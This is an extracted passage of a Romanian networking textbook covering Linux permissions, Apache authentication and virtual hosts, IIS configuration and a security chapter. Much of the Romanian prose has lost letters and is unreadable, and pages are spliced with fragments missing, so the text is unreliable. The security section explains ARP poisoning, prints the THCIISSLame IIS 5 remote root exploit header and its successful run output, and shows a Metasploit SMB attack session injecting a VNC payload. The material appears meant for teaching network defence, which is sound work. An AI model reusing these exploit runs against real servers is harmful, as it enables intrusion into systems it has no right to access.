ragnarok:~# chmod a+x test.pl
ragnarok:~# cp test.pl /usr/lib/cgi-bin/
În listing se o se ă ă utilizato ul a e deţi e i t ă ile este root, ia g upul deţi ăto este
tot root. Utilizatorul root a e toate d eptu ile pe fişie ul dir, ia g upul şi eilalţi utilizato i u
au niciun d ept. Fişie ul sample.cgi poate fi e e utat de ăt e o i e utilizato , a â d d ept de
e e uţie pe t u utilizato , g up şi eilalţi.
Î şi ui ea de d eptu i asup a u ei i t ă i î siste ul de fişie e poate fi folosită î fo at
binar, asociindu-se iţi: âte u it pe t u p eze ţa sau u a u ui d ept. Astfel, fo atul
literal rwx r-x –wx are asociat formatul binar 111 101 011. “e p efe ă fo atul o tal al
drepturilor, care pentru exemplul anterior este 753.
D eptu ile pe o i t a e î siste ul de fişie e pot fi alte ate folosi d o a da chmod. În
ele e u ează se vor prezenta mai multe exemple de rulare a chmod pentru schimbarea
su esi ă a d eptu ilo de a es pe fişie e:
toate drepturile pentru utilizator, niciun d ept pe t u eilalţi
ragnarok:~# ls -l test.txt
-rw-r--r-- 1 root root 0 Sep 23 19:23 test.txt
ragnarok:~# chmod 700 test.txt
ragnarok:~# ls -l test.txt
-rwx------ 1 root root 0 Sep 23 19:23 test.txt
ragnarok:~# ls -l test.txt
-rw-r--r-- 1 root root 0 Sep 23 19:23 test.txt
1
http://httpd.apache.org/docs/2.2/howto/htaccess.html
2
http://httpd.apache.org/docs/2.2/howto/auth.html
328 | ‘ e ţ e l e L o a l e
Tipul de autentificare folosit este Basic. Directiva AuthName defi eşte do eniul (Realm)
u a e a fi aso iată i sta ţa u e tă de aute tifi a e. Aute tifi a ea foloseşte fişie ul
precizat prin intermediul directivei AuthUserFile, î azul de faţă
/var/www/need_auth_passwd. Directiva Require spe ifi ă odul î a e se ealizează
aute tifi a ea. Î azul de faţă se pe ite a esul u ai utilizato ilo mihai şi roxana.
C ea ea şi o pleta ea fişie ului de o figu a e se ealizează u ajuto ul utilita ului
htpasswd. Astfel, pe t u ea ea fişie ului şi adăuga ea utilizato ilo mihai şi roxana se
foloseşte se e ţa de o e zi de ai jos:
ragnarok:~# htpasswd -c /var/www/need_auth_passwd mihai
New password:
Re-type new password:
Adding password for user mihai
ragnarok:~# htpasswd /var/www/need_auth_passwd roxana
New password:
Re-type new password:
Adding password for user roxana
1
http://httpd.apache.org/docs/2.2/vhosts/
329 | W o r l d W i d e W e b
Î ad ul găzdui ii azate pe ad ese IP, fie a e virtual host p i eşte o ad esă IP. Pe
anumite sisteme de operare se pot stabili mai multe adrese IP pe o i te faţă de eţea. Pe alte
siste e a fi e oie de o i te faţă supli e ta ă pe t u fie a e ad esă IP.
Totuşi, ad esele IP ostă şi su t di e î e ai g eu de o ţi ut, astfel î ât browser-ele
moderne pot folosi virtual hosting bazat pe nume. Când u se e e p i eşte o o e iu e
u u oaşte e u e de staţie hostname) a fost folosit în URL. Pentru a corecta, noua
spe ifi aţie HTTP/ . adaugă o fa ilitate p i i te ediul ă eia browser-ele pot spune
serverului ce hostname folosesc, prin intermediul antetului Host:.
Deşi găzdui ea i tuală p ezi tă a a tajul e o o isi ii de ad ese IP, t e uie ţi ut o t de
e iste ţa u o browser-e ai e hi a e u au i ple e tată spe ifi aţia HTTP/ . . Da ă u
astfel de browser se o e tează la u se e e u găzdui e i tuală azată pe u e, u a
trimite antetul Host:, aşa ă se e ul a t e ui să ăspu dă u o listă de gazde i tuale
posibile.
DocumentRoot /var/www/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
RedirectMatch ^/$ /apache2-default/
</Directory>
[...]
</VirtualHost>
Di o ţi utul fişie ului s-au păst at doa di e ti ele folosite pe t u o figu a ea găzdui ii
virtuale. Di e ti ele de o figu a e pe t u găzdui ea i tuală su t:
NameVirtualHost i di ă folosi ea găzdui ii i tuale; e o a da ea1 pe t u găzdui ea
i tuală azată pe u e este ea ea u ui fişie /etc/apache2/conf.d/virtual.conf
a e să o ţi ă opţiu ea NameVirtualHost u ată de ad esa IP folosită pe t u găzdui e
i tuală; a a te ul * î sea ă ă se e ul as ultă pe toate i te feţele;
<VirtualHost *> defi eşte u do e iu i tual; î azul î a e se foloseşte găzdui e i tuală
se foloseşte a elaşi pa a et u a şi la NameVirtualHost, î azul de faţă *;
ServerAdmin defi eşte ad esa de e-mail a administratorului domeniului;
DocumentRoot defi eşte di e to ul ădă i ă pe t u do e iul i tual o figu at;
directiva ServerName este o di e ti ă ese ţială a e defi eşte domeniul pentru care a fost
configurat virtual host-ul;
ServerAlias poate spe ifi a u u e de do e iu a e să fie dese it de a elaşi i tual host.
1
http://www.debian-administration.org/articles/412
331 | W o r l d W i d e W e b
</VirtualHost>
Directiva ServerName lipseşte i iţial di fişie ul de o figu a e aso iat do e iului i pli it
pe t u ă a esta a ăspu de pe t u toate e e ile pe t u a e u e istă u virtual host
asociat.
Do i să se o figu ează u ătoa ele do e ii:
www.domain.com u ădă i a î /usr/local/www
www.test.com u ădă i a î /var/www/test
Se va presupune un caz de test, drept pentru care domeniile de mai sus vor fi asociate
adresei locale 127.0.0.1 prin intermediul fişie ului /etc/hosts:
127.0.0.1 www.domain.com
127.0.0.2 www.test.com
Este, aşada , e oie de două virtual host-uri: unul care va asculta conexiuni necriptate pe
po tul şi altul a e a as ulta o e iu i iptate pe po tul . “e poate o se a ă, sp e
deose i e de găzdui ea i tuală azată pe u e, la găzdui ea i tuală azată pe po tu i este
e esa ă p eze ţa ad esei IP, o side ată ai i 88.77.66.55. Pe t u a easta, se eează o
opie a fişie ului de o figu aţie pe t u virtual host-ul i pli it şi se a ti ează folosi d
a2ensite:
ragnarok:~# cp /etc/apache2/sites-available/default /etc/apache2/sites-available/ssl
ragnarok:~# a2ensite ssl
Site ssl installed; run /etc/init.d/apache2 reload to enable.
1
Original, eng.: What does ’t get i stalled o ’t eed to get pat hed.
334 | ‘ e ţ e l e L o a l e
1. Se deschide Server Manager (din meniul Start > Administrative Tools sau direct din
Quick Launch);
2. “e sele tează opţiu ea Add Roles di se ţiu ea Roles Summary (sau se face clic pe Roles în
a o ele di pa tea stâ gă pe t u a afişa doa a eastă se ţiu e ;
3. “e e ifi ă o diţiile e pli ate î e a ul afişat şi se apasă Next î spe ial e e o a dată
asignarea unei adrese IP stati e î p eala il pe i te faţa de pe a e se o p i i e e ile, a şi î
cazul altor servere);
335 | W o r l d W i d e W e b
4. Din ecranul Select Server Roles se sele tează Web Server (IIS);
spe ifi a da ă se i te ţio ează a se e ul să supo te pagi i A“P, s ipt-u i CGI, să o t oleze
un server FTP, etc1.
7. “e e izuies opţiu ile sele tate pe t u i stala e şi se apasă Install pentru a porni instalarea;
8. Se î hide utilita ul de i stala e, după te i a e.
Alege ea o po e telo opţio ale u este defi iti ă după i stala ea se e ului. A estea
pot fi instalate sau dezinstalate ulterior tot din Server Manager, din pagina de diagnostic a
Web Server (IIS) localizată su atego ia Roles, p i opţiu ile Add Role Services şi Remove Role
Services.
9-5: Co ți utul u ui fişier XML de i stalare u opțiu i i pli ite pe tru II“
1
Deoa e e lista de o po e te este p ea astă pe t u a fi i lusă ai i, ea poate fi o sultată pe I te et
la adresa http://technet.microsoft.com/en-us/mscomops/cc403255.aspx
337 | W o r l d W i d e W e b
Câte a di t e optiu ile di fişie ul XML t e uie spe ifi ate ţi â d o t de aşi a pe are
se ealizează i stala ea:
Valoarea atributului version t e uie să fie aloa ea e a tă a i stală ii de Windows Server
2008. A easta se poate afla la se ţiu ea Details di pagi a de p op ietăţi a fişie ului
explorer.exe (direct în directorul %WINDIR%);
Valoarea atributului processorArchitecture a t e ui să o espu dă u p o eso ul i stalat
pe siste ul u e t. Opţiu ile su t: x86, x64 şi amd64;
o figu aţia de ază de la i stala e, II“ poate se i doa pagi i stati e fişie e HTML). Pentru
pagi ile e i lud o ţi ut di a i , a A“P Active Server Pages), ASP.NET, PHP sau CGI
(Common Gateway Interface e e esa ă adăuga ea u o odule supli e ta e.
Î pa oul e t al pot fi izualizate fie p op ietăţile u ui site, fie o ţi utul său fişie ele
propriu-zise şi st u tu a de di e toa e . Pe t u a s hi a î t e a este două odu i, e istă
butoanele Features View şi Content View în partea inferioa ă. De ase e ea, p op ietăţile pot
fi g upate după fu ţii şi afişate î ai ulte odu i, î stilul Wi do s E plo e .
Î fi e, pa oul di pa tea d eaptă, Actions, ofe ă a esul apid la dife ite o e zi şi a ţiu i
o te tuale, î fu ţie de e ele e te su t sele tate î pa oul de p op ietăţi sau î a o ele
de o e iu i di pa tea stâ gă. De ai i se poate po i sau op i se e ul da ă este sele tat î
pa tea stâ gă , se pot a ti a sau deza ti a site-u i, se pot izualiza şi a esa pagi ile de
modificare a p op ietăţilo lo şi se pot des hide apid site-urile direct în browser.
Ate ţie! Po i ea, op i ea sau esta ta ea se e ului II“ poate fi fă ută atât di i te faţa sa
de a age e t ât şi di “e e Ma age , la sele ta ea lui di lista de olu i. Modifi ă ile
efe tuate î u a di t e a este zo e pot să u fie izi ile i ediat î ealaltă. E e o a da il a
pe t u olu ile de se e e deţi i te feţe p op ii de ad i ist a e, să se i te a ţio eze u ele
doar prin intermediul acestora, Server Manager fiind folosit doa pe t u e ifi ă i şi
diag osti ă i. “e e Ma age e efi iază de o opţiu e a e a tualizează odată la fie a e
i ute i fo aţiile afişate. Î pa tea i fe ioa ă se afişează se u da ulti ei a tualiză i şi u
li k pe t u o figu a ea f e e ţei de actualizare.
2. În câmpul Site name poate fi introdus orice nume pentru noul site (numele e folosit doar în
s op ad i ist ati . Totodată, u Application Pool u a elaşi u e a fi eat ia da ă se
do eşte folosi ea u uia deja e iste t u a fi DefaultAppPool, cel implicit) se poate specifica
acest lucru printr-un clic pe butonul Select.
3. În câmpul Physical Path se i t odu e alea sp e lo aţia î a e su t sto ate fişie ele site-ului, ce
ep ezi tă, totodată, şi ădă i a sa. Calea poate des ie o lo aţie de pe se e ul lo al sau una
a esi ilă pe u alt se e , da ă espe tă o e ţia UNC.
341 | W o r l d W i d e W e b
1
Ad esa IP poate fi spe ifi ată atât î fo at IP ât şi î fo at IP .
342 | ‘ e ţ e l e L o a l e
nivelurile superioare.
HTTP Response Headers: Când un browser e e o pagi ă e u ui se e , se etu ează u
a tet HTTP î pagi a de ăspu s, e i lude e siu ea HTTP şi tipul o ţi utului. II“ u
defi eşte i pli it i iu fel de astfel de a tete. Totuşi, pe t u a u ite pagi i pot fi defi ite
a tete e o fi etu ate lie ţilo e i fo ează desp e sta ea pagi ii sp e e e plu, „Under
construction . La adăuga ea u ui a tet, se i t odu e u u e şi o aloa e e ep ezi tă alea
sp e o ţi utul a tetului.
MIME Types1: Lista de e te sii î p eu ă u u o ţi ut o espu zăto e auzează II“-ului să
etu eze a ele fişie e d ept o ţi ut stati u su t i te p etate di a i . Lista up i de
fişie e ulti edia, i agini, documente, etc.
1
MIME = Multipurpose Internet Mail Extensions. Detalii la: http://en.wikipedia.org/wiki/MIME
344 | ‘ e ţ e l e L o a l e
Modules: Modulele ep ezi tă efe ti ele e tele de od a e t atează e e ile e epţio ate de
se e . U odul î p eu ă u a ţiu ile pe a e le poate e e uta ep ezi tă u handler, iar un
handler î p eu ă u tipul de e e e ă uia i se apli ă ep ezi tă o aso ie e a sa u handler
mapping . Lista de odule dispo i ile ai i este ide ti ă u ea a esi ilă la edita ea sau
adăuga ea de i t ă i î Handler Mappings.
Output Caching: Output Cache-ul ep ezi tă o zo ă di e o ia se e ului u de su t păst ate
esu sele a esate f e e t, pe t u a opti iza atât ti pul de ăspu s la o e e e ât şi el de
lo aliza e a u ei esu se. Este utilă folosi ea u ui astfel de cache î spe ial î situaţiile î a e
serverul depinde de programe secundare pentru procesare (CGI) sau pentru acces la
date/ esu se aze de date . Da ă e o ia dispo i ilă se e ului este p ea i ă, se a eli e a
memoria cache. Ce e ile o o ti ua apoi să fie păst ate şi î cache pe ăsu ă e su t
î depli ite. Adăuga ea u ei oi eguli de caching se face prin selectarea lui Add din panoul de
a ţiu i. O egulă de caching poate fi defi ită p i u ăto ii pa a et i:
o File name extension: E te sia fişie elo asup a ă o a se a apli a egula u e tă de caching.
o User-mode caching: Configu ează egula u e tă să sto heze o ţi utul cache-ului î spaţiul
utilizato . A tualiza ea i fo aţiilo di e o ia te po a ă poate fi fă ută î o e tul î a e II“
p i eşte o otifi a e de odifi a e a o ţi utului u ui fişie , egulat, la i te ale fixe de timp sau se
poate ea o egulă a e î piedi ă e pli it caching-ul u ui a u it tip de fişie . La setă ile a a sate
se poate o figu a a se e ul să sto heze î cache e siu i dife ite ale a eluiaşi fişie î fu ţie de
variabilelele sau antetele din cereri.
o Kernel-mode caching: Co figu ează egula u e tă să sto heze o ţi utul cache-ului î spaţiul
kernel. A a tajul o stă î faptul ă etu a ea o ţi utului stati di spaţiul kernel se face mai
apid de ât î azul spaţiului utilizato . Opţiu ile legate de a tualiza e i fo aţiilo di cache sunt
a eleaşi a şi la User-mode caching, ai puţi setă ile a a sate. Da ă se a ti ează atât User-mode
caching ât şi Kernel-mode caching şi se foloseşte a tualiza ea la i te ale egulate, u a eeaşi
valoare o figu ată î a ele situaţii, se a folosi auto at doa cache-ul din kernel.
SSL Settings: Pe ite odifi a ea e i ţelo ““L Secure Sockets Layer) pentru site-u i şi
apli aţii, î p eu ă u odul de t ata e a e tifi atelo sosite di pa tea lie ţilo . “e poate
spe ifi a folosi ea iptă ii pe sau de iţi.
Authentication: Descrie metodele de autentificare folosite pentru accesul la un site. Se pot
folosi autentifi ă i di u ătoa ele atego ii: anonymous, ASP.NET impersonation, basic,
digest, forms şi Windows authentication. Doar în cazul în care serverul este membru al unui
do e iu este posi ilă folosi ea lui digest authentication.
Logging: Pe ite lui II“ să înregistreze în jurnale cererile. Se poate alege calea în care vor fi
sto ate ju alele, tipu ile de i t ă i e o fi s ise î ele p e u şi odul şi f e e ţa u a e
se va realiza rotirea jurnalelor.
9.4.6 Securitate
1
http://www.windowsitlibrary.com/Content/716/06/toc.html
2
NT LAN Manager, protocol de autentificare proprietar Microsoft
3
http://en.wikipedia.org/wiki/Kerberos_(protocol)
346 | ‘ e ţ e l e L o a l e
t a s ise e iptate, astfel ă este e esa ă utiliza ea alto apa ilităţi de ipta e ale
se e ului e î o ju ţie u Basic Authentication pe t u a p oteja i fo aţiile. Pe t u a
putea folosi acest tip de aute tifi a e, fie a e utilizato t e uie să e efi ieze d eptul de a se
o e ta lo al, pe siste ul se e ului e . Pe t u a se uşu a ad i ist a ea î azul î a e
o tu ile î egist ate su t u e oase, utilizato ii pot fi adăugaţi u ui g up a e să le ofere
d eptu ile e esa e asup a fişie elo şi lo aţiilo pe a e a eştia t e uie să le a eseze.
Ca şi elelalte tipu i de aute tifi ă i, utiliza ea Basic Authentication e esită i stala ea
u ui odul opţio al al II“. I stala ea odulelo poate fi fă ută atât la i stala ea i iţială a
se e ului ât şi p i opţiu ea Add Role Services din Server Manager, sub grupul IIS. Basic
Authentication poate fi găsit su atego ia Security din lista de module disponibile.
9.4.6.3 SSL
Î od i pli it, o u i aţia di t e u lie t şi u se e e se fa e fă ă a se u iza
i fo aţiile t a s ise şi fă ă a se lua ăsu i î pot i a elo e ar putea intercepta aceste
date. Î o se i ţă, i fo aţiile o ţi ute î e e i şi ăspu su i pot fi i te eptate şi
i te p etate de u ata ato e poate as ulta o u i aţia la i elul eţelei. Pe i olul î a est
az o stă atât î i te epta ea fişie elo t a sfe ate î t e se e şi lie t ât şi î posi ilitatea
de a i te epta datele folosite la aute tifi ă i e u i ple e tează i t i se eo etodă de
securizare (ca în cazul Basic Authentication sau Forms Authetication, descrise pe scurt
a te io şi utiliza ea lo pe t u a i pe so a u utilizato auto izat şi a do â di a esul la
resurse securizate.
Pe t u a p e e i astfel de situaţii se poate folosi ““L Secure Sockets Layer) sau
protocoalele mai noi TLS (Transport Layer Security) pentru a securiza o u i aţia di t e se e
şi lie ţi. TL“ ep ezi tă u sta da d foa te ăspâ dit şi a eptat de ajo itatea browserelor
347 | W o r l d W i d e W e b
1
Active Directory Certificate Services este disponibil ca rol pentru Windows Server 2008 şi poate fi
instalat din Server Manager, i te faţa Add Roles.
348 | ‘ e ţ e l e L o a l e
4. Tot în cadrul site-ului sele tat a te io , se a esează di Features View opţiu ea SSL Settings
(fig. 9-14).
5. Opţiu ile e ţi de ““L pe it utiliza ea iptă ii pe de iţi sau pe de iţi. De ase e ea,
de ai i poate fi o figu at şi o po ta e tul se e ului î azul î a e lie ţii fu izează
e tifi ate pe t u p op ia lo ide titate: poate fi setat să le ig o e, să le a epte da ă su t
fu izate sau să a epte doa lie ţii a e p ezi tă u e tifi at alid. Î azul î a e se
spe ifi ă faptul ă doa lie ţii u e tifi ate alide au a es, a eştia o t e ui să ai ă i stalat
în browserul propriu certificatul respectiv.
6. “e sele tează Apply di pa oul de a ţiu i şi se e ifi ă oua o figu aţie. Ate ţie, a esa ea
site-ului se fa e a u p i p oto olul HTTP“, de i ad esa t e uie să fie p e edată de a esta.
O soluţie pe t u e ita ea e esităţii de a i lude p oto olul HTTP“ î ad esa site-ului, când
a esta este a esat de ăt e lie ţi, este defi i ea a două site-uri, primul cu binding pentru
HTTP, pe portul 80, iar al doilea cu binding doa pe t u HTTP“ şi po tul . Apoi, se poate
folosi facilitatea de HTTP Redirect1 din Features View pentru primul site pentru a redirecta
toate cererile spre site-ul se u izat. Ate ţie, î a est az, u t e uie defi ită a eeaşi ădă i ă
pentru ambele site-u i, altfel se a o ţi e o edi e ta e i fi ită sp e a elaşi site.
Ca şi î azul adăugă ii alto odule, după i stala ea HTTP Redirect poate fi e esa ă
repornirea Server Manager-ului pe t u a opţiu ea să fie dispo i ilă la i el de se e şi site.
1
HTTP Redirect este diponibil sub forma unei compo e te opţio ale II“, dispo i ilă la i stala e sau p i
i te faţa Add ‘ole “e i es di “e e Ma age , su II“.
349 | W o r l d W i d e W e b
1
http://go.microsoft.com/fwlink/?LinkId=59279
350 | ‘ e ţ e l e L o a l e
În acest moment, IIS este capabil de a interpreta pagini PHP. Pentru a test acest lucru, se
poate ea u fişie .php într-un director al site-ului o figu at ai sus, a â d o ţi utul
<?php phpinfo(); ?> şi accesându-l.
De ase e ea, se a o se a faptul ă se p i eşte o e oa e sau se listează o ţi utul
di e to ului, î fu ţie de opţiu ea de la Directory Browsing î azul î a e se î ea ă
a esa ea u ei lo aţii e o ti e u fişie index.php deoarece II“ u a fost setat să
e u oas ă fişie ele i de u e te sia .php. Pe t u a easta, î se ţiu ea Default Document,
tot în cadrul site-ului sele tat ai sus, se adaugă şi i t a ea pe t u index.php.
Pentru a vizualiza lista proceselor curente, starea unui anumit proces sau lista proceselor
asociate unui application pool, se pot folosi o e zile u ătoa e:
appcmd list wps
appcmd list wp „2244”
appcmd list wps /apppool.name:DefaultAppPool
Î ge e al, pe t u odifi a ea o figu aţiei, se spe ifi ă se ţiu ea sau U‘L-ul, urmat de
pa a et ul de odifi at î p eu ă u oua sa aloa e. P i u ătoa ele două o e zi se
setează pa ametrul Enabled pe t u se ţiu ea defaultDocument la valoarea true pentru
întregul server sau pentru un anumit URL din cadrul unui site:
353 | W o r l d W i d e W e b
Î tre ări
1. “iste ul WWW se azează pe u odel lie t/se e , odul de o u i a e î t e
lie t şi se e fii d defi it de p oto olul HTTP. Cu a ată e e ea ge e ată de
browser-ul d s. atu i â d î e aţi să a esaţi www.test.com/file.html?
GET www.test.com/file.html HTTP
GIVE www.test.com/file.html HTTP/1.0
GET www.test.com/file.html HTTP/1.0
GET /file.html HTTP/1.0
4. Care este utilizatorul folosit de Apache pentru accesarea unei resurse din sistemul
lo al de fişie e?
root
www-user
www-data
nobody
Cine este...
Kevin Mitnick este u ul di te ei ai u os uţi ha ke i di a ii - . El a euşit sa
spa gă eţeaua DEC pe t u a edea odul su să de la VM“ şi a i t at î siste e Moto ola,
NEC, Nokia, “u şi Fujitsu “ie e s. Ke i Mit i k a de e it u os ut p i faptul ă a fost
p i ul ha ke al ă ui p o es a fost ediatizat pe s a ă la gă. El a e u os ut ă a păt u s
î di e se eţele folosi du-se în principal de "so ial e gi ee i g" şi a fost o damnat la 5
ani de închisoa e. După eli e a e î şi-a eat p op ia fi ă de o sulta ţă î
domeniul se u ităţii. A s is două ă ţi: The A t of De eptio şi The A t of I t usio .
Gordon Lyon u os ut şi su pseudo i ul de F odo Vasko i h este u e pe t î
se u itate şi, aşa u îşi spu e, "tipul u de ha ke ". El este auto ul u os utului p og a
de s a a e ap. L o a a ut u ol a ti î o u itatea de se u itate a eţelelo î ă di
anii 90. Pseudonimul lui, Fyodor, a fost luat de la celebrul autor rus Fyodor Dostoyevsky.
De-a lu gul ulti ilo a i, ulte te e teh i e spe ifi e do e iului se u ităţii au pă ăsit
do e iul IT, fii d p eluate de zia e, ju ale TV, sau hia de i dust ia i e atog afi ă. Di
pă ate, p o esul u a u ă it, el ai adesea, adu e ea î sfe a pu li ă a o eptelo de
se u itate, i spe ula ea se zaţio alului p i ig o a ea o st â ge ilo lu ii eale, du â d la
promovarea unor noi mituri ale erei IT.
Î ziua de astăzi, deja se o side ă o ale „pe fo a ţele ha ke ilo di fil ele
americane, a e euşes să o p o ită se u itatea u ui siste î âte a se u de. E istă
oa e i a e ed ă este posi il să s ii i uşi pe t u siste e de ope a e e t ate est e ezi
„)iua I depe de ţei , .
Pentru cei e au des his a est apitol î spe a ţa o ţi e ii u ei pute i e ă gi ite î
controlul tutu o siste elo ele t o i e u ează o deza ăgi e: paginile e u ează u
euşes de ât să adu ă u pi de o di e î do e iul populat de itu i al se u ităţii IT.
Atacul ARP poisoning p esupu e edi e ţio a ea t afi ului di t e o i e staţie di eţeaua
lo ală şi routerul de ieşi e di LAN gateway p i staţia ata ato ului. Acest lucru este realizat
p i t i ite ea de pa hete A‘P atât e e i A‘P, ât şi ăspu su i u i fo aţii alte ate.
Pentru exemplificare, fie azul di figu a de ai jos, î a e staţia C do eşte să
i te epteze t afi ul di t e staţiile A şi B. Pe t u a easta, staţia C a t i ite două pa hete A‘P
de tip ăspu s false: o dată pe t u staţia B, î a e se spe ifi ă faptul ă ad esa de i el a
staţiei A este AA:BB:CC:00:00:13, şi o dată pe t u staţia A, î a e se spe ifi ă faptul ă
adresa de nivel a staţiei B este tot AA:BB:CC:00:00:13.
Astfel, atu i â d staţia A do eşte să t i ită u pa het staţiei B, îl a t i ite staţiei C. La
fel, atu i â d staţia B do eşte să t i ită u pa het staţiei A, îl a t i ite tot staţiei C. Pentru
a p o esul să fu ţio eze, staţia C a t e ui să t i ită pa hetele p i ite staţiilo a e su t
ad esate. Î plus, staţia C t e uie să et i ită pa hetele A‘P false la i te ale egulate.
A easta pe t u ă i t ă ile di ta ela A‘P su t e a uate după u ti p, az î a e staţia a
t i ite u pa het A‘P de i te oga e. Da ă staţia i te ogată ăspu de, i t a ea di ta ela A‘P
a fi a tualizată şi astfel t afi ul u a ai aju ge la staţia C.
C
192.168.1.13
AA:BB:CC:00:00:13
A B
192.168.1.11 192.168.1.12
AA:BB:CC:00:00:11 AA:BB:CC:00:00:12
Apa iţia s it hu ilo î eţelele lo ale au t a sfo at ediul pa tajat al Ethernet-ului într-
u ediu dedi at. Astfel, u ad i ist ato de eţea e do eşte o ito iza ea t afi ului ăt e o
a u ită desti aţie a t e ui a, î ai te de a la sa p og a ul de i te epta e a t afi ului, să
fa ă u ata ARP poisoning pe t u espe ti a desti aţie. Pe t u a easta poate folosi o i e
generator de pachete, cele mai utilizate fiind: Cain, dsniff, IPSorcery.
Atacurile pe Web se împart î două atego ii: ata u i asup a platformei: sistem de
ope a e, se i ii, o u i aţii, şi ata u i asup a apli ației, a e izează o p o ite ea
sistemului sau a utilizatorului.
Atacurile asupra platformei se azează pe e ploata ea u o ul e a ilităţi în sistemul de
ope a e, î se i iile e puse, sau î p oto oalele utilizate. A estea u ă es o ţi e ea
a esului la date eauto izate sau i apa ita ea se i iului. A este ata u i e ifi ă po tu ile
deschise în firewall, e siu ile se i iilo a ti e şi apoi aută ul e a ilităţi u os ute pe a e
să le utilizeze pe t u a o ţi e a es la siste e. Ata u ile se pot aza, de e e plu, pe bug-uri
î e siu ile de ““H, î se e ele de FTP, DN“ sau “MTP şi el ai adesea hia î se e ele
Web (Apache sau IIS).
Va fi prezentat î o ti ua e u e e plu u os ut de eșă de se u itate p eze tă î II“:
Microsoft Windows IIS 5.0 Remote Buffer Overflow, publicat în buletinul de securitate MS04-
011. Codul exploit-ului poate fi o ţi ut de la http://www.milw0rm.com/exploits/275 şi
compilat cu cl Visual C . Ata ul se azează pe e ploata ea u ui buffer overflow în serverul de
e şi ge e ează u shell a e as ultă pe u po t spe ifi at la ula e.
Extras din codul exploit-ului:
/*****************************************************************************/
/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */
/* v0.2 - This little update uses a connectback shell ! */
/* v0.1 - First release with portbinding shell on 31337 */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/
Rularea exploit-ului:
C:\>iisexploit www.site.com myserver 8082
THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)
[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit successful ! Have fun !
1
Codul exploit-ului poate fi găsit ai i: http://www.securiteam.com/exploits/5HP0P1F8AM.html.
362 | ‘ e ţ e l e L o a l e
Insecure Object Reference, sau atacul de tip Directory Traversal este spe ifi apli aţiilo
e , şi se azează pe efe e ţie ea u ei esu se u fișie , de e e plu pe aza u o
info aţii a e pot fi a ipulate de u ata ato . A esta a putea să iteas ă di e se fișie e de
pe serverul web (etc/shadow) sau ar putea injecta cod extern (de pe un alt server) în paginile
apli aţiei.
Information Leakage / Error Handling este o altă ul e a ilitate des î tâl ită î azul
apli aţiilo e . A easta se dato ează u o e o i de o figu a e a se e ului e , sau
g eșelilo de p og a a e a e pot di ulga p ea ulte i fo aţii desp e i f ast u tu a i te ă,
o ite ii deza ti ă ii opţiu ilo de debugging pe ediul î p odu ţie, et . U e e plu de
apli aţie auditată î ealitate o ţi ea î t -u a di t e pagi ile A“P u ăto ul o e ta iu
HTML:
<!-- #include virtual ="/include/connections.inc" -->
http://www.packetstormsecurity.org/
http://osvdb.org/
http://www.securityfocus.com/
366 | ‘ e ţ e l e L o a l e
10.3.2 Metasploit
P i t e utilita ele de e alua e a ul e a ilităţilo siste elo se u ă ă Metasploit, Nessus,
sau Ettercap. În continuare se va ilust a fu ţio a ea u o astfel de p oie te p i p eze ta ea
Metasploit.
Câștigăto ul u ei p estigioase edalii Best of Open Source Software Awards 2008 la
se ţiu ea de “e u itate, p oie tul Metasploit pu e la dispoziţia o u ităţii e a is e
a a sate pe t u dez olta ea, testa ea şi la sa ea ata u ilo î pot i a siste elo i fo ati e.
Fu ţia de ază a u ui framework este de a ea o platfo ă o siste tă pe t u ati ge ea
unui obiectiv. Metasploit o ţi e î plus o ole ţie de u elte, biblioteci, odule şi i te feţe
folosite î p eu ă pe t u e ploata ea eșelo de se u itate. Ve siu ea . este s isa î Ruby,
iar compo e tele î C şi Asse le , î pa adig a open-source, ofe i d atât o ază solidă
pe t u dez olta ea p op iilo odule, ât şi po ta ilitatea framework-ului pe o ga ă la gă de
siste e de ope a e e i lud Wi do s, Li u şi Ma O“.
Metasploit poate i te a ţio a u utilizato ul folosi d atât li ia de o a dă, ap e iată de
utilizato ii a a saţi, ât şi î t -u ediu g afi , su fo a u ei i te feţe e sau a u ei
apli aţii GUI stand-alone, e o a dat p i elo o ta te u apli aţia.
getuid, kill, ps, reg pentru manipularea regişt ilo sau a i te feţei g afi e idletime şi
uictl pe t u a ti a ea/deza ti a ea i te a ti ităţii siste ului u utilizato ul legiti .
Alte fa ilitaţi i te esa te ale Metasploit i lud posi ilitatea la să ii exploit-urilor printr-un
la ţ de se e e p o testat de ăt e o u itate u de se e e pe t u as a ea su sei şi
modulul autopwn care permite atacarea unui subnet întreg din doar câteva comenzi prin
integrarea cu nmap şi auto atiza ea p i ilo pat u pași des iși a te io .
Un exemplu de vulnerabilitate în protocolul SMB (File Sharing) pe Windows XP este
prezentat mai jos:
1. Scanarea de porturi (nmap) . “ a a ea de ul e a ilităţi
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
373 | “ e u i t a t e a eţelei
Exploit target:
Id Name
-- ----
2 Windows XP English
>> set RHOST 192.168.128.5 // OPTIUNE EXPLOIT (IP TINTA)
RHOST => 192.168.128.5
>> show advanced
Module advanced options: .... (OMISE PENTRU BREVITATE)
>> show payloads
Compatible payloads
===================
Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
.............. (OMISE PENTRU BREVITATE)
>> set PAYLOAD windows/vncinject/bind_tcp // PAYLOAD INJECTARE SERVER VNC
PAYLOAD => windows/vncinject/bind_tcp
>> exploit // LANSARE EXPLOIT
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.128.5[\lsarpc]...
[*] Getting OS information...
